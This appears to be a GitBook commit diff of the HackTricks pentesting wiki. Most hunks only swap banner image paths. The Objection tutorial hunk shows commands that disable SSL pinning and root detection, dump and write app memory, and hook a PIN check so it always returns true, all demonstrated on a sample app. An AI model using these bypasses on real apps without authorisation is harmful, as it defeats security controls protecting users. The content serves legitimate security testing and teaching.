GitBook: [#3440] No subject
BIN
.gitbook/assets/image (1) (1) (2).png
Normal file
After Width: | Height: | Size: 84 KiB |
Before Width: | Height: | Size: 84 KiB After Width: | Height: | Size: 143 KiB |
Before Width: | Height: | Size: 143 KiB After Width: | Height: | Size: 154 KiB |
BIN
.gitbook/assets/image (2) (1) (2).png
Normal file
After Width: | Height: | Size: 51 KiB |
Before Width: | Height: | Size: 51 KiB After Width: | Height: | Size: 76 KiB |
Before Width: | Height: | Size: 76 KiB After Width: | Height: | Size: 178 KiB |
BIN
.gitbook/assets/image (70) (1).png
Normal file
After Width: | Height: | Size: 98 KiB |
Before Width: | Height: | Size: 98 KiB After Width: | Height: | Size: 71 KiB |
BIN
.gitbook/assets/image (73) (1).png
Normal file
After Width: | Height: | Size: 14 KiB |
Before Width: | Height: | Size: 14 KiB After Width: | Height: | Size: 197 KiB |
BIN
.gitbook/assets/image (78) (1).png
Normal file
After Width: | Height: | Size: 10 KiB |
Before Width: | Height: | Size: 10 KiB After Width: | Height: | Size: 132 KiB |
BIN
.gitbook/assets/image (8) (2).png
Normal file
After Width: | Height: | Size: 126 KiB |
Before Width: | Height: | Size: 126 KiB After Width: | Height: | Size: 96 KiB |
BIN
.gitbook/assets/image (81) (1).png
Normal file
After Width: | Height: | Size: 49 KiB |
Before Width: | Height: | Size: 49 KiB After Width: | Height: | Size: 37 KiB |
Before Width: | Height: | Size: 154 KiB After Width: | Height: | Size: 48 KiB |
|
@ -159,6 +159,7 @@
|
|||
* [AD Certificates](windows-hardening/active-directory-methodology/ad-certificates.md)
|
||||
* [Account Persistence](windows-hardening/active-directory-methodology/ad-certificates/account-persistence.md)
|
||||
* [Domain Escalation](windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md)
|
||||
* [Domain Persistence](windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md)
|
||||
* [Certificate Theft](windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.md)
|
||||
* [AD information in printers](windows-hardening/active-directory-methodology/ad-information-in-printers.md)
|
||||
* [ASREPRoast](windows-hardening/active-directory-methodology/asreproast.md)
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# Linux Forensics
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -168,7 +168,7 @@ ThisisTheMasterSecret
|
|||
```
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -233,7 +233,7 @@ find /sbin/ –exec rpm -qf {} \; | grep "is not"
|
|||
```
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -376,7 +376,7 @@ usbrip ids search --pid 0002 --vid 0e0f #Search for pid AND vid
|
|||
More examples and info inside the github: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip)
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -466,7 +466,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# Brute Force - CheatSheet
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -84,7 +84,7 @@ python3 cupp.py -h
|
|||
* [**https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm**](https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm)
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -441,7 +441,7 @@ crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
|
|||
```
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -641,7 +641,7 @@ crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./cert.pfx
|
|||
```
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -808,7 +808,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# Python Sandbox Escape & Pyscript
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -51,7 +51,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# Bypass Python sandboxes
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../../.gitbook/assets/image.png)
|
||||
![](<../../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -322,7 +322,7 @@ with (a as b):
|
|||
```
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../../.gitbook/assets/image.png)
|
||||
![](<../../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -710,7 +710,7 @@ You can check the output of this script in this page:
|
|||
{% endcontent-ref %}
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../../.gitbook/assets/image.png)
|
||||
![](<../../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -1118,7 +1118,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../../.gitbook/assets/image.png)
|
||||
![](<../../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# venv
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -62,7 +62,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# Web Requests
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -142,7 +142,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# Search Exploits
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -85,7 +85,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# Docker Basics & Breakout
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../../.gitbook/assets/image.png)
|
||||
![](<../../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -124,7 +124,7 @@ tar -zcvf private_keys_backup.tar.gz ~/.docker/trust/private
|
|||
When I changed Docker host, I had to move the root keys and repository keys to operate from the new host.
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../../.gitbook/assets/image.png)
|
||||
![](<../../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -254,7 +254,7 @@ docker run -it --security-opt=no-new-privileges:true nonewpriv
|
|||
For more **`--security-opt`** options check: [https://docs.docker.com/engine/reference/run/#security-configuration](https://docs.docker.com/engine/reference/run/#security-configuration)
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../../.gitbook/assets/image.png)
|
||||
![](<../../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -397,7 +397,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../../.gitbook/assets/image.png)
|
||||
![](<../../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# Useful Linux Commands
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -148,7 +148,7 @@ sudo chattr -i file.txt #Remove the bit so you can delete it
|
|||
```
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -327,7 +327,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# Android Applications Pentesting
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -63,7 +63,7 @@ adb pull /data/app/com.android.insecurebankv2- Jnf8pNgwy3QA_U5f-n_4jQ==/base.apk
|
|||
```
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -246,7 +246,7 @@ An application may contain secrets (API keys, passwords, hidden urls, subdomains
|
|||
{% endcontent-ref %}
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -496,7 +496,7 @@ Probably you know about this kind of vulnerabilities from the Web. You have to b
|
|||
* [**Secure Flag** in cookies](../../pentesting-web/hacking-with-cookies/#cookies-flags)
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -687,7 +687,7 @@ python androwarn.py -i my_application_to_be_analyzed.apk -r html -v 3
|
|||
|
||||
### [MARA Framework](https://github.com/xtiankisutsa/MARA\_Framework)
|
||||
|
||||
![](<../../.gitbook/assets/image (81).png>)
|
||||
![](<../../.gitbook/assets/image (81) (1).png>)
|
||||
|
||||
**MARA** is a **M**obile **A**pplication **R**everse engineering and **A**nalysis Framework. It is a tool that puts together commonly used mobile application reverse engineering and analysis tools, to assist in testing mobile applications against the OWASP mobile security threats. Its objective is to make this task easier and friendlier to mobile application developers and security professionals.
|
||||
|
||||
|
@ -705,7 +705,7 @@ It is able to:
|
|||
Useful to detect malware: [https://koodous.com/](https://koodous.com)
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -802,7 +802,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../../.gitbook/assets/image.png)
|
||||
![](<../../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# Objection Tutorial
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,8 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
|
||||
# **Introduction**
|
||||
## **Introduction**
|
||||
|
||||
[![objection](https://github.com/sensepost/objection/raw/master/images/objection.png)](https://github.com/sensepost/objection)
|
||||
|
||||
|
@ -27,11 +26,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
**Note:** This is not some form of jailbreak / root bypass. By using `objection`, you are still limited by all of the restrictions imposed by the applicable sandbox you are facing.
|
||||
|
||||
## Resume
|
||||
### Resume
|
||||
|
||||
The **goal** of **objection** is let the user call the **main actions that offers Frida**. **Otherwise**, the user will need to create a **single script for every application** that he wants to test.
|
||||
|
||||
# Tutorial
|
||||
## Tutorial
|
||||
|
||||
For this tutorial I am going to use the APK that you can download here:
|
||||
|
||||
|
@ -39,13 +38,13 @@ For this tutorial I am going to use the APK that you can download here:
|
|||
|
||||
Or from its [original repository ](https://github.com/asvid/FridaApp)(download app-release.apk)
|
||||
|
||||
## Installation
|
||||
### Installation
|
||||
|
||||
```
|
||||
pip3 install objection
|
||||
```
|
||||
|
||||
## Connection
|
||||
### Connection
|
||||
|
||||
Make a **regular ADB conection** and **start** the **frida** server in the device (and check that frida is working in both the client and the server).
|
||||
|
||||
|
@ -55,11 +54,11 @@ If you are using a **rooted device** it is needed to select the application that
|
|||
objection --gadget asvid.github.io.fridaapp explore
|
||||
```
|
||||
|
||||
## Basic Actions
|
||||
### Basic Actions
|
||||
|
||||
Not all possible commands of objections are going to be listed in this tutorial, only the ones that I have found more useful.
|
||||
|
||||
### Environment
|
||||
#### Environment
|
||||
|
||||
Some interesting information (like passwords or paths) could be find inside the environment.
|
||||
|
||||
|
@ -69,7 +68,7 @@ env
|
|||
|
||||
![](<../../../.gitbook/assets/image (64).png>)
|
||||
|
||||
### Frida Information
|
||||
#### Frida Information
|
||||
|
||||
```
|
||||
frida
|
||||
|
@ -77,58 +76,58 @@ frida
|
|||
|
||||
![](<../../../.gitbook/assets/image (65).png>)
|
||||
|
||||
### Upload/Download
|
||||
#### Upload/Download
|
||||
|
||||
```bash
|
||||
file download <remote path> [<local path>]
|
||||
file upload <local path> [<remote path>]
|
||||
```
|
||||
|
||||
### Import frida script
|
||||
#### Import frida script
|
||||
|
||||
```bash
|
||||
import <local path frida-script>
|
||||
```
|
||||
|
||||
### SSLPinning
|
||||
#### SSLPinning
|
||||
|
||||
```bash
|
||||
android sslpinning disable #Attempts to disable SSL Pinning on Android devices.
|
||||
```
|
||||
|
||||
### Root detection
|
||||
#### Root detection
|
||||
|
||||
```bash
|
||||
android root disable #Attempts to disable root detection on Android devices.
|
||||
android root simulate #Attempts to simulate a rooted Android environment.
|
||||
```
|
||||
|
||||
### Exec Command
|
||||
#### Exec Command
|
||||
|
||||
```bash
|
||||
android shell_exec whoami
|
||||
```
|
||||
|
||||
### Screenshots
|
||||
#### Screenshots
|
||||
|
||||
```bash
|
||||
android ui screenshot /tmp/screenshot
|
||||
android ui FLAG_SECURE false #This may enable you to take screenshots using the hardware keys
|
||||
```
|
||||
|
||||
## Static analysis made Dynamic
|
||||
### Static analysis made Dynamic
|
||||
|
||||
In a real application we should know all of the information discovered in this part before using objection thanks to **static analysis**. Anyway, this way maybe you can see **something new** as here you will only have a complete list of classes, methods and exported objects.
|
||||
|
||||
This is also usefull if somehow you are **unable to get some readable source code** of the app.
|
||||
|
||||
### List activities, receivers and services
|
||||
#### List activities, receivers and services
|
||||
|
||||
```
|
||||
android hooking list activities
|
||||
```
|
||||
|
||||
![](<../../../.gitbook/assets/image (78).png>)
|
||||
![](<../../../.gitbook/assets/image (78) (1).png>)
|
||||
|
||||
```
|
||||
android hooking list services
|
||||
|
@ -137,15 +136,15 @@ android hooking list receivers
|
|||
|
||||
Frida will launch an error if none is found
|
||||
|
||||
### Getting current activity
|
||||
#### Getting current activity
|
||||
|
||||
```
|
||||
android hooking get current_activity
|
||||
```
|
||||
|
||||
![](<../../../.gitbook/assets/image (73).png>)
|
||||
![](<../../../.gitbook/assets/image (73) (1).png>)
|
||||
|
||||
### Search Classes
|
||||
#### Search Classes
|
||||
|
||||
Lets start looking for classes inside our application
|
||||
|
||||
|
@ -155,7 +154,7 @@ android hooking search classes asvid.github.io.fridaapp
|
|||
|
||||
![](<../../../.gitbook/assets/image (69).png>)
|
||||
|
||||
### Search Methods of a class
|
||||
#### Search Methods of a class
|
||||
|
||||
Now lets extract the methods inside the class _MainActivity:_
|
||||
|
||||
|
@ -163,9 +162,9 @@ Now lets extract the methods inside the class _MainActivity:_
|
|||
android hooking search methods asvid.github.io.fridaapp MainActivity
|
||||
```
|
||||
|
||||
![](<../../../.gitbook/assets/image (70).png>)
|
||||
![](<../../../.gitbook/assets/image (70) (1).png>)
|
||||
|
||||
### List declared Methods of a class with their parameters
|
||||
#### List declared Methods of a class with their parameters
|
||||
|
||||
Lets figure out wich parameters does the methods of the class need:
|
||||
|
||||
|
@ -175,7 +174,7 @@ android hooking list class_methods asvid.github.io.fridaapp.MainActivity
|
|||
|
||||
![](<../../../.gitbook/assets/image (79).png>)
|
||||
|
||||
### List classes
|
||||
#### List classes
|
||||
|
||||
You could also list all the classes that were loaded inside the current applicatoin:
|
||||
|
||||
|
@ -185,9 +184,9 @@ android hooking list classes #List all loaded classes, As the target application
|
|||
|
||||
This is very useful if you want to **hook the method of a class and you only know the name of the class**. You coul use this function to **search which module owns the class** and then hook its method.
|
||||
|
||||
## Hooking being easy
|
||||
### Hooking being easy
|
||||
|
||||
### Hooking (watching) a method
|
||||
#### Hooking (watching) a method
|
||||
|
||||
From the [source code](https://github.com/asvid/FridaApp/blob/master/app/src/main/java/asvid/github/io/fridaapp/MainActivity.kt) of the application we know that the **function** _**sum()**_ **from** _**MainActivity**_ is being run **every second**. Lets try to **dump all possible information** each time the function is called (arguments, return value and backtrace):
|
||||
|
||||
|
@ -197,7 +196,7 @@ android hooking watch class_method asvid.github.io.fridaapp.MainActivity.sum --d
|
|||
|
||||
![](<../../../.gitbook/assets/image (71).png>)
|
||||
|
||||
### Hooking (watching) an entire class
|
||||
#### Hooking (watching) an entire class
|
||||
|
||||
Actually I find all the methods of the class MainActivity really interesting, lets **hook them all**. Be careful, this could **crash** an application.
|
||||
|
||||
|
@ -209,7 +208,7 @@ If you play with the application while the class is hooked you will see when **e
|
|||
|
||||
![](<../../../.gitbook/assets/image (72).png>)
|
||||
|
||||
### Changing boolean return value of a function
|
||||
#### Changing boolean return value of a function
|
||||
|
||||
From the source code you can see that the function _checkPin_ gets a _String_ as argument and returns a _boolean_. Lets make the function **always return true**:
|
||||
|
||||
|
@ -219,7 +218,7 @@ Now, If you write anything in the text box for the PIN code you will see tat any
|
|||
|
||||
![](<../../../.gitbook/assets/image (77).png>)
|
||||
|
||||
## Class instances
|
||||
### Class instances
|
||||
|
||||
Search for and print **live instances of a specific Java class**, specified by a fully qualified class name. Out is the result of an attempt at getting a string value for a discovered objection which would typically **contain property values for the object**.
|
||||
|
||||
|
@ -229,7 +228,7 @@ android heap print_instances <class>
|
|||
|
||||
![](<../../../.gitbook/assets/image (80).png>)
|
||||
|
||||
## Keystore/Intents
|
||||
### Keystore/Intents
|
||||
|
||||
You can play with the keystore and intents using:
|
||||
|
||||
|
@ -239,16 +238,16 @@ android intents launch_activity
|
|||
android intent launch_service
|
||||
```
|
||||
|
||||
## Memory
|
||||
### Memory
|
||||
|
||||
### Dump
|
||||
#### Dump
|
||||
|
||||
```bash
|
||||
memory dump all <local destination> #Dump all memory
|
||||
memory dump from_base <base_address> <size_to_dump> <local_destination> #Dump a part
|
||||
```
|
||||
|
||||
### List
|
||||
#### List
|
||||
|
||||
```
|
||||
memory list modules
|
||||
|
@ -264,7 +263,7 @@ Lets checks what is frida exporting:
|
|||
|
||||
![](<../../../.gitbook/assets/image (68).png>)
|
||||
|
||||
### Search/Write
|
||||
#### Search/Write
|
||||
|
||||
You can alse search and write inside memory with objection:
|
||||
|
||||
|
@ -273,23 +272,22 @@ memory search "<pattern eg: 41 41 41 ?? 41>" (--string) (--offsets-only)
|
|||
memory write "<address>" "<pattern eg: 41 41 41 41>" (--string)
|
||||
```
|
||||
|
||||
## SQLite
|
||||
### SQLite
|
||||
|
||||
You cals can use the command `sqlite` to interact with sqlite databases.
|
||||
|
||||
## Exit
|
||||
### Exit
|
||||
|
||||
```
|
||||
exit
|
||||
```
|
||||
|
||||
# What I miss in Objection
|
||||
## What I miss in Objection
|
||||
|
||||
* The hooking methods sometimes crashes the application (this is also because of Frida).
|
||||
* You can't use the instaces of the classes to call functions of the instance. And you can't create new instances of classes and use them to call functions.
|
||||
* There isn't a shortcut (like the one for sslpinnin) to hook all the common crypto methods being used by the application to see cyphered text, plain text, keys, IVs and algorithms used.
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
@ -305,5 +303,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# Android APK Checklist
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -97,7 +97,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# 8086 - Pentesting InfluxDB
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -164,7 +164,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# 5432,5433 - Pentesting Postgresql
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -99,7 +99,7 @@ ORDER BY 1;
|
|||
```
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -179,7 +179,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
# Command Injection
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -101,7 +101,7 @@ Here are the top 25 parameters that could be vulnerable to code injection and si
|
|||
```
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||
|
@ -187,7 +187,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
![](../.gitbook/assets/image.png)
|
||||
![](<../.gitbook/assets/image (1).png>)
|
||||
|
||||
\
|
||||
Use [**Trickest**](https://trickest.io/) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
